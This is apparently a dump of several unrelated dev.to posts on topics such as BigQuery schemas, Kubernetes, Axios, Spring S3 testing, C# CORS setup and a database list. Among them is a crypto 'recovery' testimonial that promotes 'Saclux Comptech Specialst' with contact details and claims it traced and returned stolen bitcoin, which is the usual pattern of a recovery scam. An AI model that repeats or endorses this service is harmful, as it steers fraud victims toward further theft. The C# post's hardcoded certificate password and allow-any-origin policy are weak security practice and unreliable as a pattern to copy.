When we load data from a CSV file, we use the LoadJobConfig method with the autodetect parameter set to True. This tells BigQuery's data importer (bq load) to peek at the first 500 records of your data to guess its schema. This works well for smaller datasets, especially if the data originates from a well-defined source like a pre-existing database.

### Manual Definition: Tedious for Large & Evolving Data
When dealing with data extracted from a service like a REST API, that might have thousands of records, or where older records may have different fields compared to newer ones, auto-detection falls short. Here, manually defining the schema becomes necessary. The traditional approach is to manually create a schema.json file.
Sure, you could skim through the JSON data, assuming you possess reading skills like Josh2funny ([Checkout the Nigerian comedian](https://youtu.be/k4szRq1R-08?si=xrMQ7sobeDuE723e&t=39)), and define the schema based on that. But wouldn't it be nice to have a more reliable approach?
### [PyPI’s bigquery-schema-generator](https://pypi.org/project/bigquery-schema-generator/)
This Python package is a lifesaver when it comes to generating BigQuery schemas. It works with newline-delimited data, whether it's in JSON, CSV format, or even a list of Python dictionaries and csv.DictReader objects. Unlike BigQuery's data importer, this package analyzes all your data to create a more accurate and error-free schema. Plus, it spares you the confusion that often arises with BigQuery's Repeated Mode and RECORD data type.
**Installation: Getting Started**
To install bigquery-schema-generator within your virtual environment, simply run:
`pip3 install bigquery-schema-generator`
**Usage**
The package offers various ways to integrate it into your workflow:
- Command Line: You can use it directly from the command line by running the included shell script, invoking the Python module, or using a Python script. The PyPI documentation provides all the details on these methods.
- As a Library : This is the method I used as indicated in the code below.

([Checkout the project](https://github.com/Noela-T/altschool-projects/tree/main/py_gcs_bq) I implemented with this tool.) | noela_tenku |
1,917,862 | AI Workforce Evolution: Emerging Roles and Future Perspectives | 1. Introduction The landscape of work and employment has been significantly reshaped by... | 27,673 | 2024-07-09T22:44:59 | https://dev.to/rapidinnovation/ai-workforce-evolution-emerging-roles-and-future-perspectives-433j | ## 1\. Introduction
The landscape of work and employment has been significantly reshaped by the
advent of artificial intelligence (AI). As technology continues to advance, AI
is becoming increasingly integral to various industries, driving efficiency,
innovation, and transformation. This evolution is not only changing how tasks
are performed but also creating a dynamic shift in the workforce landscape,
necessitating new skills and roles.
## 2\. Understanding Prompt Engineers
Prompt engineering is a burgeoning field that has gained prominence with the
rise of advanced AI models, particularly in natural language processing and
generation. Prompt engineers specialize in designing, testing, and refining
prompts to effectively interact with AI models to produce desired outcomes.
## 3\. Exploring AI Operations Managers
AI Operations Managers play a pivotal role in the integration and management
of AI within organizations. As companies increasingly adopt AI technologies,
the need for specialized roles to oversee these operations becomes crucial.
## 4\. Training and Education
Pursuing a career in AI requires a solid educational foundation typically
starting with a bachelor’s degree in computer science, data science,
mathematics, or a related field. Advanced degrees like a master's or Ph.D. can
be particularly beneficial for those looking to delve deeper into specialized
areas of AI.
## 5\. Industry Demand and Job Outlook
The industry demand and job outlook across various sectors can significantly
influence career choices, educational pursuits, and business strategies.
Understanding the current market trends and future projections is crucial for
stakeholders at all levels.
## 6\. Case Studies and Real-World Applications
Case studies and real-world applications are essential for understanding the
practical implications of theoretical research. They provide concrete examples
of how concepts and theories are implemented in real-world scenarios, offering
insights into their effectiveness, challenges, and impacts.
## 7\. Challenges and Solutions
Every business faces challenges, but the key to success lies in identifying
these challenges early and finding effective solutions. Common challenges
include technological changes, market competition, regulatory compliance, and
workforce management.
## 8\. Conclusion
The integration of artificial intelligence (AI) into various sectors is
reshaping the landscape of work and workforce development. The future of AI
workforce development looks promising, with a strong emphasis on continuous
learning and adaptability.
## 9\. References
When compiling a research paper, thesis, or any academic or professional
document, the inclusion of references is crucial. References provide the
foundation for your arguments, enhance the credibility of your work, and
acknowledge the contributions of others in the field.
📣📣Drive innovation with intelligent AI and secure blockchain technology! Check
out how we can help your business grow!
[Blockchain App Development](https://www.rapidinnovation.io/service-
development/blockchain-app-development-company-in-usa)
[AI Software Development](https://www.rapidinnovation.io/ai-software-
development-company-in-usa)
## URLs
* <https://www.rapidinnovation.io/post/rise-of-prompt-engineers-and-ai-managers-in-2024>
## Hashtags
#AIWorkforce
#PromptEngineering
#AIManagement
#AITraining
#FutureOfWork
| rapidinnovation | |
1,917,866 | An excellent Modbus slave (server) simulator and serial port debugging tool. | Main Features Download URL: Modbus Slave Emulator Supports various Modbus protocols,... | 0 | 2024-07-09T22:54:32 | https://dev.to/redisant/an-excellent-modbus-slave-server-simulator-and-serial-port-debugging-tool-c0a | modbus, slave, tooling, developer | ### Main Features
**Download URL: [Modbus Slave Emulator](https://www.redisant.com/mse)**
- Supports various Modbus protocols, including:
- Modbus RTU
- Modbus ASCII
- Modbus TCP/IP
- Modbus UDP/IP
- Modbus RTU Over TCP/IP
- Modbus RTU Over UDP/IP
- Monitors communication data on serial lines or Ethernet
- Supports up to 28 data formats, including: Signed, Unsigned, Hex, Binary, Long, Float, Double, etc.
- Switches between Modbus protocol addresses and PLC addresses
- Plots real-time charts for data in any number of registers, monitoring data trends
- Allows simultaneous creation of multiple network connections and numerous slave devices
- Managed through multiple tabs, enabling quick switching between slave devices
- Manages registers in a table format, supporting variable names and comments, as well as switching background and foreground colors
- Exports/Imports slave device register data to Excel
- Built-in byte conversion tool for converting Long, Float, Double type data to register data
- Supports a rich set of Modbus function codes:
- 01 (0x01) Read Coils
- 02 (0x02) Read Discrete Inputs
- 03 (0x03) Read Holding Registers
- 04 (0x04) Read Input Registers
- 05 (0x05) Write Single Coil
- 06 (0x06) Write Single Register
- 08 (0x08) Diagnostics (Serial only)
- 11 (0x0B) Get Communication Event Counter (Serial only)
- 15 (0x0F) Write Multiple Coils
- 16 (0x10) Write Multiple Registers
- 17 (0x11) Report Server ID (Serial only)
- 22 (0x16) Mask Write Register
- 23 (0x17) Read/Write Multiple Registers
- 43/14 (0x2B/0x0E) Read Device Identification
### Software Screenshots
**Quickly Create Multiple Connections and Multiple Slave Devices**
Modbus Slave Emulator supports various Modbus protocols (RTU, ASCII, TCP/IP, UDP/IP, RUT Over TCP, RUT Over UDP); you can create multiple connections simultaneously and add multiple slave devices to the network, quickly setting up your testing platform.

**Supports a Variety of Data Formats**
You can view and edit register data in multiple formats; supports up to 28 data formats, including: Signed, Unsigned, Hex, Binary, Long, Float, Double, etc.

**Byte Order Conversion Tool**
Quickly convert Long, Float, Double type data to register byte sequences using the convenient tool provided by Modbus Slave Emulator.

**Real-time Plotting**
Plot real-time charts for any number of registers, making data trends clear at a glance; supports X-Y axis zooming and image export.

**Monitor Communication Data**
Using Modbus Slave Emulator, you can monitor detailed communication data on serial lines or Ethernet, helping you quickly debug and troubleshoot issues.

**Easing Functions**
Modbus Slave Emulator comes with dozens of built-in easing functions to simulate changes in register values, providing a more realistic data simulation experience.

**Download URL: [Modbus Slave Emulator](https://www.redisant.com/mse)** | redisant |
1,917,879 | Day 0 - Beginning My Full-Stack Development Journey with JavaScript | Today marks the first step of my journey towards becoming a full-stack developer. Despite being in a... | 0 | 2024-07-09T23:29:33 | https://dev.to/ryoichihomma/day-1-beginning-my-full-stack-development-journey-with-javascript-2dld | Today marks the first step of my journey towards becoming a full-stack developer. Despite being in a non-tech role, I've decided to kick things off with the "JavaScript Essential Training" course on LinkedIn Learning.
### Why JavaScript?
Well, before diving headfirst into frameworks like React.js, I wanted to revisit and reinforce my skillsets in JavaScript. As someone passionate about building robust and dynamic web applications, mastering JavaScript is key to unlocking a world of possibilities in web development.
### Sharing Progress
My goal with this journey is not only to acquire technical knowledge but also to share my experiences and insights with you all. That's why I've committed to posting daily updates here on DEV, documenting my learnings, challenges, and the occasional "aha!" moments that come with mastering a new skill.
So, here's to Day 1 of many more to come! I'm excited about the road ahead and can't wait to see where this journey takes me. Stay tuned for tomorrow's update, where I'll dive deeper into JavaScript and share more of my coding adventures.
Happy coding!💻 | ryoichihomma | |
1,917,869 | Day 9 : Deploying Microservices on Kubernetes - Project Journey | Hey guys, it's Day 9 of my SRE and Cloud Security journey, and I'm pumped to share what I... | 0 | 2024-07-09T23:06:30 | https://dev.to/arbythecoder/day-9-deploying-microservices-on-kubernetes-project-journey-3c39 | microservices, kubernetes, devops, beginners | Hey guys, it's Day 9 of my SRE and Cloud Security journey, and I'm pumped to share what I accomplished today! I successfully deployed a three-microservice application on Kubernetes – it was definitely a challenge, but I tackled it head-on and learned a ton in the process. Let's just say, I had more than a few "oh, no, not again" moments, but I emerged victorious, and that's what matters!
I'm excited to share the challenges I faced, the solutions I implemented, and everything in between. Buckle up, because this journey is packed with valuable insights, and maybe even a few laughs along the way. I hope it inspires you as much as it inspired me to take on this project. Let's dive in!
**Project Structure:**
- **bookstore/**
- **deployments/** (deployment YAML files for each microservice)
- **services/** (service YAML files for each microservice)
- **ingress/** (`ingress.yaml` for external access)
- **README.md** (setup and deployment instructions)
**Setting Up the Kubernetes Cluster:**
- Installed Minikube (`minikube start`) for a local single-node cluster. It was like setting up a mini-city for my microservices!
- Verified cluster status with `kubectl cluster-info`. Just ensuring everything ran smoothly, like checking if the traffic lights were working in my Lagos city.
**Deploying Microservices:**
- Applied deployment YAML files (`kubectl apply -f deployments/<file>`) for each microservice. It was like sending my microservices to their new homes in the Kubernetes city.
- Defined and applied service YAML files (`kubectl apply -f services/<file>`) for internal and external access. Now my microservices could interact with each other and the outside world.
**Configuring Ingress:**
- Created and applied `ingress.yaml` to route external traffic using annotations and hostnames. This was like building a grand entrance to my microservices city, making it easy for visitors to find their way around.
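For reference, a minimal Ingress along these lines might look like the following sketch (the hostname, service name, and path here are hypothetical placeholders, not necessarily the ones I used):

```
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: bookstore-ingress
  annotations:
    nginx.ingress.kubernetes.io/rewrite-target: /
spec:
  rules:
    - host: bookstore.local
      http:
        paths:
          - path: /books
            pathType: Prefix
            backend:
              service:
                name: books-service
                port:
                  number: 80
```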
**Challenges:**
- **Image Pull Issues:** Incorrect image names/tags led to `ImagePullBackOff` and `ErrImagePull` errors. It was like finding the right address in a city with confusing street signs.
- **Networking Configuration:** Connectivity problems between microservices due to incorrect service configurations. It was like trying to build a network of roads without a proper map.
- **Ingress Setup:** Difficulties exposing microservices externally due to incorrect Ingress configuration. It was like trying to build a grand entrance without knowing where the door should go.
**Solutions:**
- **Image Pull:** Verified image names/tags, corrected deployment files, and ensured images were available in the registry. I finally found the right street signs and made sure the addresses were correct.
- **Networking:** Updated service configurations with appropriate service types (ClusterIP, LoadBalancer). I got my hands on a proper map and built the roads correctly.
- **Ingress:** Configured Ingress with correct annotations, host definitions, and ensured the Ingress controller was properly set up. I finally found the right spot for the door and built a grand entrance that everyone could admire.
**Additional Challenge:**
- **Host File Modification:** Since I didn't have a domain name, I had to manually add the generated IP address of my Kubernetes cluster to the host file on my Windows machine. This involved opening the host file (`C:\Windows\System32\drivers\etc\hosts`) as administrator, adding the IP address and desired domain name, and saving the changes. It was like adding a new address to my own personal map to find my way to my microservices city.
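Concretely, the added line looks something like this (both values below are placeholders: the IP comes from `minikube ip` and the hostname is whatever you chose):

```
# C:\Windows\System32\drivers\etc\hosts
192.168.49.2    bookstore.local
```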
**Conclusion:**
Day 9 involved deploying microservices on Kubernetes, overcoming image pull, networking, and Ingress configuration challenges. The host file modification was an additional step to access the cluster using a custom domain name. This project reinforced my understanding of Kubernetes deployments and the importance of thorough configuration and troubleshooting. I'm feeling pretty confident now, like I've got the map to my microservices city memorized! | arbythecoder |
1,917,871 | O que é e como usar o axios? | O que é? Axios é uma biblioteca de JavaScript que permite fazer requisições HTTP de... | 0 | 2024-07-09T23:11:03 | https://dev.to/nathanndos/o-que-e-e-como-usar-o-axios-3i3l | ## O que é?
Axios é uma biblioteca de JavaScript que permite fazer requisições HTTP de maneira simples e eficiente, em resumo é um cliente HTTP baseado em promises.
## Como instalar?
`yarn add axios`

| nathanndos | |
1,917,872 | Evoluindo sua estratégia de Testes para FileUpload com Spring Test e Amazon S3 | Em meu último artigo, discutimos como pode ser implementado um serviço de file upload utilizando... | 0 | 2024-07-10T11:15:01 | https://dev.to/jordihofc/evoluindo-sua-estrategia-de-testes-para-fileupload-com-spring-test-e-amazon-s3-22ap | testing, spring, aws, amazons3 | Em meu último artigo, discutimos como pode ser implementado um serviço de file upload utilizando Spring Boot e Amazon S3. Lá entendemos quais são as preocupações e ferramentas necessárias para permitir que você customize as regras de como gerenciar seus arquivos. Se você não leu ainda, recomendo que o faça, antes de ler este artigo.
{% embed https://dev.to/jordihofc/desvendando-o-segredo-como-implementar-file-upload-com-spring-boot-e-amazon-s3-1jd1 %}
Após publicar o artigo, percebi que diversas pessoas tinham dúvidas de quais os possíveis caminhos para escrever testes que tragam segurança e confiabilidade para o File Upload.
Dado a isso, hoje vamos bater um papo sobre como podemos evoluir a estratégia de testes, partindo dos testes unitários até os queridos testes de integração.
OBS: A escolha da estratégia de testes pode variar dado contexto, como, por exemplo, familiaridade da equipe com tecnologia, conhecimento técnico, limitação do ambiente, etc.
## Escrevendo Testes de Unidade
Essa é de longe a estratégia mais utilizada pelos Dev's e Empresas, e seu principal objetivo é validar se cada pedaço de código isolado funciona como esperado. Então é comum que nessa técnica as características estruturais do código sejam validadas, esta técnica é indicada para sistemas que possuem logicas complexas, como, por exemplo: cálculo de juros, folha de ponto, e qualquer outro sistema que possua logica com alto uso de estrutura de decisão e repetição.
Outro ponto interessante sobre os testes de unidade é que, como seu objetivo é validar a menor unidade de código possível, normalmente quando a classe ou método que está sendo testado possui dependências internas ou externas costuma-se simular esse comportamento, e isso é o que chamamos de Mocks ou dublês. Normalmente, quando se escrevem testes desta categoria, utilizamos ferramentas como JUnit, Hamcrest, AssertJ e Mockito.
### Vamos ver como funciona na prática
Antes de iniciar a construção do teste, vamos relembrar o código de produção, que foi divido em duas classes, a classe _FileUpload_ representa o arquivo que será armazenado no S3, e _FileStorageService_ que representa o serviço que se integrará com Amazon S3 e fará o upload dos arquivos.
```java
public record FileUpload(MultipartFile data){}
@Service
public class FileStorageService {
@Autowired
private S3Template template;
private String bucket = "myBucketName";
public String upload(FileUpload fileUpload) {
try (var file = fileUpload.data().getInputStream()) {
String key = UUID.randomUUID().toString();
S3Resource uploaded = template.upload(bucket, key, file);
return key;
} catch (IOException ex) {
throw new RuntimeException("Não foi possivel realizar o upload do documento");
}
}
}
```
O código acima pode ser resumido em, inicialmente, o método `upload()` recebe uma instância da classe _FileUpload_ que carrega um _MultipartFile_ recebido mediante uma chamada HTTP. Em seguida, o arquivo a ser salvo no bucket, é aberto dentro do _**try-with-resources**_, caso alguma exceção seja lançada na abertura do arquivo, a mesma é tratada, e a streaming de dados é fechada automaticamente, causando a interrupção da execução do método. Caso contrário é criado uma chave de acesso ao arquivo, e envia respectivamente o arquivo para o Amazon S3, finalizando o método retornando sua chave de acesso.
```java
@ExtendWith(MockitoExtension.class)
class FileStorageServiceUnitTest {
@Mock
private S3Template s3Template;
@Mock
private MultipartFile file;
@Mock
private S3Resource uploaded;
private String bucketName = "myBucketName";
@Test
@DisplayName("Deve fazer o upload de um arquivo")
void t0() {
//cenario
FileUpload fileUpload = new FileUpload(file);
FileStorageService fileStorageService = new FileStorageService(s3Template, bucketName);
when(s3Template.upload(any(), any(), any())).thenReturn(uploaded);
//acao
String acesseKeyFile = fileStorageService.upload(fileUpload);
//validacao
assertNotNull(acesseKeyFile);
}
}
```
Iniciamos a escrita dos testes unitários, definindo a classe que será responsável por agrupar os casos de testes, a mesma deve ser preparada para oferecer suporte a execução do Mockito junto a ferramenta JUnit. Dado a isso, o primeiro passo será anotar a classe com `@ExtendWith(MockitoExtension.class)`, que permitirá a definição de dubles (_Mocks_) através das anotações `@Mock` e `@Spy`. Em seguida cuidamos de provisionar as dependências do _S3Template_ e _MultipartFile_, como não iremos provisionar o contexto do Spring, precisaremos definir os comportamentos das mesmas, então definimos as mesmas como _Mocks_, anotando previamente cada atributo com `@Mock`. Também iremos precisar de simular a resposta do _S3Template_, que retorna um objeto do tipo _S3Resource_, então também declaramos um atributo previamente anotado com `@Mock`.
O próximo passo é a definição do nosso caso de teste, então separamos o testes em 3 etapas, sendo elas: **cenário**, **ação** e **validação**. Na etapa **cenário** vamos definir as dependências que o teste precisa para executar, então é inicialmente criado uma instância do _FileUpload_, que recebe o duble do _MultipartFile_ que definimos anteriormente. Como o _FileStorageService_ executa o método `upload()` do `S3Template` precisamos definir este comportamento através da API de _When_ do Mockito, que cria um gatilho para que **Quando** o método `s3Template.upload()` seja chamado, com qualquer entrada, o objeto _S3Resource_ seja retornado na resposta. Por fim, instanciamos a _FileStorageService_ que recebe via construtor o nome do bucket e o duble do _S3Template_.
Já na etapa de **ação**, é onde vamos executar o nosso código de produção para colher o resultado e aplicar uma validação de modo a garantir que o resultado é equivalente ao esperado. Então simplesmente invocamos o método `fileStorageService.upload()` e armazenamos sua resposta a fim de executar as validações na próxima etapa. Na etapa de **validação**, vamos validar se realmente existe uma chave de acesso ao recurso criado, e para isso utilizaremos o `assertNotNull` já que a criação da chave de acesso não está em nosso controle.
### Ai eu te pergunto, como esse teste me ajuda a garantir que o _FileUpload_ funciona como deveria?
Em suma, esse teste ajuda muito pouco a trazer segurança e qualidade ao desenvolvimento da funcionalidade, já que o mesmo, busca cobrir apenas características estruturais do código, como operadores If, Else, For, Try, entre outros. Sem falar que um teste de unidade, toda execução é feita em memória, o que torna o extremamente rápido, porém, como nem tudo são flores, deixamos de validar toda a configuração da integração com Spring Cloud AWS e Amazon S3. Sem falar que a integração propriamente dita nem é executada, podendo ocasionar em erros não esperados durante a execução em produção.
A solução para o problema descrito acima, é aproximar o cenário do teste ao ambiente de produção, e a boa notícia é que o Spring Test fornece uma ampla gama de ferramentas que permitem executar o contexto do framework e se integrar a containers e dependências externas, como eu disse em:
{% embed https://dev.to/jordihofc/3-dicas-para-criar-uma-estrategia-moderna-de-testes-para-microsservicos-spring-boot-49a5 %}
### Evoluindo para um Teste de Integração com Spring Test, Test Containers e LocalStack
Antes de sair modificando o teste, precisamos adequar nossas dependências, então já adicione em sua ferramenta de build, as dependências de Spring Test Containers, TestContainers JUnit e LocalStack.
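As an illustration, with Gradle these test dependencies could look roughly like this (artifact coordinates shown without versions — check the versions that match your Spring Boot release):

```groovy
dependencies {
    // Spring Boot's Testcontainers integration (@ServiceConnection, etc.)
    testImplementation "org.springframework.boot:spring-boot-testcontainers"
    // JUnit 5 support for Testcontainers (@Testcontainers, @Container)
    testImplementation "org.testcontainers:junit-jupiter"
    // LocalStack module to emulate AWS services such as S3
    testImplementation "org.testcontainers:localstack"
}
```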
```JAVA
@SpringBootTest
@Testcontainers
@ActiveProfiles("test")
class FileStorageServiceTest {
@Autowired
private S3Template s3Template;
@Value("${s3.bucket.name}")
private String bucketName;
@Value("classpath:uploads/file.txt")
private Resource file;
@Autowired
private FileStorageService fileStorageService;
@Container
static LocalStackContainer LOCALSTACK_CONTAINER = new LocalStackContainer(
DockerImageName.parse("localstack/localstack")
).withServices(S3);
@DynamicPropertySource
static void registerS3Properties(DynamicPropertyRegistry registry) {
registry.add("spring.cloud.aws.endpoint",
() -> LOCALSTACK_CONTAINER.getEndpointOverride(S3).toString());
registry.add("spring.cloud.aws.region.static",
() -> LOCALSTACK_CONTAINER.getRegion().toString());
registry.add("spring.cloud.aws.credentials.access-key",
() -> LOCALSTACK_CONTAINER.getAccessKey().toString());
registry.add("spring.cloud.aws.credentials.secret-key",
() -> LOCALSTACK_CONTAINER.getSecretKey().toString());
}
@BeforeEach
void setUp() {
s3Template.createBucket(bucketName);
}
@AfterEach
void tearDown() {
s3Template.deleteBucket(bucketName);
}
@Test
@DisplayName("Deve fazer o upload de um arquivo")
void t0() throws IOException {
//cenario
MockMultipartFile fileRequest = new MockMultipartFile("data", file.getInputStream());
FileUpload fileUpload = new FileUpload(fileRequest);
//acao
String keyAcessResource = fileStorageService.upload(fileUpload);
//validacao
assertTrue(s3Template.objectExists(bucketName, keyAcessResource));
s3Template.deleteObject(bucketName, keyAcessResource);
}
}
```
A primeiro momento, precisamos adaptar nossa classe de testes, para suportar a inicialização do _ApplicationContext_ do Spring. Também é necessário que as configurações referentes ao ambiente de teste sejam aplicadas, então anotaremos a classe com `@SpringBootTest` e `@ActiveProfiles("test")`. Em seguida, vamos indicar para o JUnit que essa classe de teste faz o uso de containers gerenciados pelo TestContainers, então adicionamos a anotação `@Testcontainers` sobre a assinatura da classe.
O próximo passo, é indicar as dependências que utilizaremos durante a escrita do teste, para este caso, iremos precisar obter do _ApplicationContext_ instâncias do _S3Template_, _FileStorageService_, então utilizaremos a injeção de dependências via campo, anotando os atributos previamente com `@Autowired`. E para finalizar esta etapa, colheremos a propriedade: `s3.bucket.name` para obter o nome do bucket.
E também iremos colher o arquivo que será enviado ao bucket, então anotaremos os campos, _file_ e _bucketName_ respectivamente com a anotação `@Value`.
Na etapa atual, nosso objetivo é criar a infraestrutura necessária para que o JUnit seja capaz de instanciar um container da LocalStack, expondo o serviço do Amazon S3, e em seguida integrando o mesmo no _ApplicationContext_. A primeiro momento iremos definir o container, através da abstração _LocalStackContainer_, como desejamos que o JUnit gerencie o ciclo de vida do container, anotaremos este atributo com `@Container`. Por fim, não menos importante, vamos conectar o S3 a Aplicação através do método `registerS3Properties()` que cuida, de atualizar os valores das properties de conexão com os dados do container.
Após preparar a aplicação para simular o cenário mais próximo de produção possível, podemos partir para escrita dos testes. Lembramos que uma característica essencial dos testes é que devem garantir o isolamento um dos outros. Então como boa prática, foi definido os métodos `setUp()` e `tearDown()`, que irão auxiliar na construção e destruição do ambiente para cada caso de teste. O método `setUp()` está previamente anotado com `@BeforeEach` para ser executado antes de cada teste e crie o bucket com nome definido. Já o método `tearDown()` está anotado com `@AfterEach` para ser executado ao fim de cada teste, destruindo o bucket criado anteriormente.
Por fim, iniciaremos a construção do nosso teste de integração, então ao dividiremos o teste, nas queridas etapas de **cenário**, **ação** e **validação**. No **cenário**, criaremos um objeto do tipo _MockMultipartFile_ informando o nome do campo, e o file obtido no _classpath_ anteriormente. Por fim, instanciamos um _FileUpload_ recebendo o _MultipartFile_ criado. Na etapa de **ação**, invocamos o serviço de storage e realizamos o upload do arquivo, recebendo como retorno a sua chave de acesso. já na etapa de **validação**, podemos validar se o arquivo realmente existe no bucket, garantindo assim o comportamento esperado nosso serviço, através da validação do efeito colateral. Você pode ter mais detalhes do código neste [repositório](https://github.com/JordiHOFC/sample-storage-file-with-spring-aws-s3).
## Conclusão
Durante este artigo pudemos observar que existem diversas estratégias para a escrita de testes em um sistema que realiza o upload de arquivos em um bucket do S3. E que, ao fazer a escolha de uma estratégia de testes, devemos avaliar antes as limitações que o ambiente nos traz, o nível de competência da equipe com as ferramentas e até mesmo o tempo disponível para uma determinada entrega.
Também foi discutido como os testes unitários favorecem uma cobertura de características relacionadas a estrutura do código, e são ótimos validadores da escrita de lógicas que se baseiam em estruturas de decisão, controle, repetição. Porém, são péssimos candidatos a cobertura de características que estejam relacionadas as operações de I/O, já que por natureza todo teste de unidade é rodado em memória e normalmente possuem alto uso de mocks, que evitam o comportamento real do sistema.
Sendo assim, uma estratégia interessante para contexto onde a maioria das operações são de I/O é o uso de testes de integração, já que os mesmos, se aproximam do cenário de produção, permitindo a antecipação de erros e bugs, que poderiam ser descobertos nas etapas de CI e CD e pelo usuário final do sistema.
Agora me diz você, qual estratégia faz mais sentido em seu contexto? Deixe nos comentários.
Não se esqueça de me seguir nas redes sociais para receber mais dicas sobre Engenharia de Software e Desenvolvimento Backend.
[Linkedin](https://www.linkedin.com/in/jordihofc)
[Twitter](https://twitter.com/JordihSilva)
[Instagram](https://www.instagram.com/silvah.jordi/)
| jordihofc |
1,917,873 | How can i recover my lost bitcoin investment from fake online investment | I will forever be grateful to Saclux Comptech Specialst. I almost lost my life after falling victim... | 0 | 2024-07-09T23:18:25 | https://dev.to/charlotte_hannahleia_e5e/how-can-i-recover-my-lost-bitcoin-investment-from-fake-online-investment-58h5 | bitcoin, cryptocurrency, softwaredevelopment, news | I will forever be grateful to Saclux Comptech Specialst. I almost lost my life after falling victim to a scam that went on for weeks, I got contacted by a man on Linkedin pretending to be a Forex trader investor, and he told me I’d make huge profits if I invested on his platform not knowing that I was being targeted, He had lured me in with enticing promises and guarantees, and I fell victim to his deceitful tactics not knowing it was scam.
After realizing that I had been scammed, I felt a deep sense of despair and hopelessness. But then, I found a testimonial from Saclux Comptech Specialst on Reddit about how they recovered lost digital currency to scam victims, so I grabbed the opportunity quickly and contacted them. Their experts used advanced techniques and cutting-edge technology to trace and recover my funds. They worked tirelessly to ensure I received my digital currency back, and their dedication paid off.
Thanks to their efforts, I was able to recover a significant portion of my lost digital currency. I'm grateful for their assistance and highly recommend their services to anyone facing a similar situation. Don't lose hope if you've lost your digital currency – there are resources available to help you recover your funds. Take action, and don't let lost crypto investment or corrupted wallets get in the way of reclaiming your digital assets!" Reach out to Them via the information below
Email: sacluxcomptechspecialst@engineer.com
Website: https://sacluxcomptechspecialst.com/
Telegram: SacluxComptechTeam
| charlotte_hannahleia_e5e |
1,917,878 | Liberar consumo de API C# | Apesar de parecer simples liberar API para uso no visual studio, no meu caso sempre veio com algum... | 0 | 2024-07-09T23:55:22 | https://dev.to/nathanndos/liberar-consumo-de-api-c-48j6 | Apesar de parecer simples liberar API para uso no visual studio, no meu caso sempre veio com algum problema que fizesse com que desse erro nas requisições pelo postman, dispositivo móvel ou por algum projeto.
Dito isso, eu fiquei quebrando cabeça pra resolver e abaixo eu listei algumas coisas que podem resolver esse problema.
## CORS #1
A primeira coisa a ser feita é liberar o CORS(lá ele), mas antes vamos entender o que é e como funciona.
#### O que é?
CORS significa Cross-Origin Resource Sharing que consiste em um mecanismo que permite aplicações web façam requisições para um servidor em outro domínio além da aplicação que está hospedada.
#### Como funciona?
Em resumo, o CORS funciona como um validador de origem, afim de garantir segurança do usuário.
#### Algumas configurações
- Access-Control-Allow-Origin: Especifica quais origens podem acessar os recursos.
- Access-Control-Allow-Methods: Especifica quais métodos HTTP (GET, POST, etc.) são permitidos para a requisição.
- Access-Control-Allow-Headers: Especifica quais cabeçalhos HTTP podem ser usados na requisição.
- Access-Control-Allow-Credentials: Indica se os cookies e credenciais HTTP podem ser incluídos na requisição (usado em requisições com credenciais, como cookies de autenticação).
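In practice, these settings surface as HTTP response headers sent by the server. A typical (purely illustrative) preflight response might look like this:

```http
HTTP/1.1 204 No Content
Access-Control-Allow-Origin: https://app.example.com
Access-Control-Allow-Methods: GET, POST, PUT, DELETE
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Credentials: true
```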
### Resolução
No arquivo program.cs da API no visual Studio larga o seguinte código, só confere antes se você já não tinha adicionado algo antes:
```csharp
var builder = WebApplication.CreateBuilder(args);

builder.Services.AddControllers();
// Learn more about configuring Swagger/OpenAPI at https://aka.ms/aspnetcore/swashbuckle
builder.Services.AddEndpointsApiExplorer();
builder.Services.AddSwaggerGen();

builder.Services.AddCors(options =>
{
    options.AddPolicy("AllowAll",
        policy =>
        {
            policy.AllowAnyOrigin()
                  .AllowAnyMethod()
                  .AllowAnyHeader();
        });
});

var app = builder.Build();

// Configure the HTTP request pipeline.
if (app.Environment.IsDevelopment())
{
    app.UseSwagger();
    app.UseSwaggerUI();
}

app.UseHttpsRedirection();
app.UseCors("AllowAll");
app.UseAuthorization();
app.MapControllers();

app.Run();
```
## Kestrel #2
Antes de fazer este passo recomendo que faça o passo anterior e teste
#### O que é?
Kestrel é um servidor integrado fornecido pelo ASP.NET Core e responsável por processar as requisições HTTP.
#### Como funciona?
Este servidor funciona otimizando e organizando as requisições que são feitas, a partir das configurações de porta, Ip e certificados SSL. Além disso, é importante que destacar que é multiplataforma.
#### Resolução
A configuração abaixo deve ser feita dentro do arquivo appsettings.json, sendo HTTP e/ou HTTPs. Lembrando que a porta vai alterar de acordo com o que você usa.
```json
{
  "Logging": {
    "LogLevel": {
      "Default": "Information",
      "Microsoft.AspNetCore": "Warning"
    }
  },
  "AllowedHosts": "*",
  "Kestrel": {
    "Endpoints": {
      "Http": {
        "Url": "http://0.0.0.0:5111"
      },
      "Https": {
        "Url": "https://0.0.0.0:5001",
        "Certificate": {
          "Path": "certificate.pfx",
          "Password": "password"
        }
      }
    }
  }
}
```
## Liberando portas no firewall #3
Siga os prints abaixo. Lembrando que faremos isso para a entrada e para a saída.
#### Entrada





#### Saída




| nathanndos | |
1,917,880 | List of 45 databases in the world | Under the Hood Let’s not waste time here is the list of all databases SQL... | 0 | 2024-07-09T23:34:04 | https://dev.to/shreyvijayvargiya/list-of-45-databases-in-the-world-57e8 | database, vectordatabase, fauna, mongodb | Under the Hood
--------------
Let’s not waste time: here is the list of all the databases.
SQL Databases
-------------
### Traditional RDBMS
* [PostgreSQL](https://www.postgresql.org/) — Advanced, open-source relational database known for its reliability, feature robustness, and performance.
* [Oracle](https://www.oracle.com/database/) — Widely used commercial relational database management system known for its scalability and enterprise features.
* [MySQL](https://www.mysql.com/) — Popular open-source relational database known for its speed and reliability.
* [SQLite](https://www.sqlite.org/) — Lightweight, disk-based database that’s self-contained and serverless.
* [Microsoft SQL Server](https://www.microsoft.com/en-us/sql-server/) — Commercial relational database by Microsoft, known for its ease of integration with other Microsoft products.
* [IBM DB2](https://www.ibm.com/db2) — IBM’s enterprise database known for its advanced data management capabilities.
* [Amazon RDS](https://aws.amazon.com/rds/) — Managed relational database service by AWS supporting several database engines including MySQL, PostgreSQL, and Oracle.
### Modern SQL DBs
* [CockroachDB](https://www.cockroachlabs.com/) — Distributed SQL database built for cloud applications.
* [VoltDB](https://www.voltdb.com/) — High-performance in-memory SQL database.
* [Supabase](https://supabase.com/) — Open-source Firebase alternative, offers a backend as a service built on PostgreSQL.
* [YugabyteDB](https://www.yugabyte.com/) — Distributed SQL database for high-performance and cloud-native applications.
* [Timescale](https://www.timescale.com/) — Open-source time-series SQL database optimized for fast ingest and complex queries.
* [PlanetScale](https://planetscale.com/) — Serverless database platform built on MySQL and Vitess.
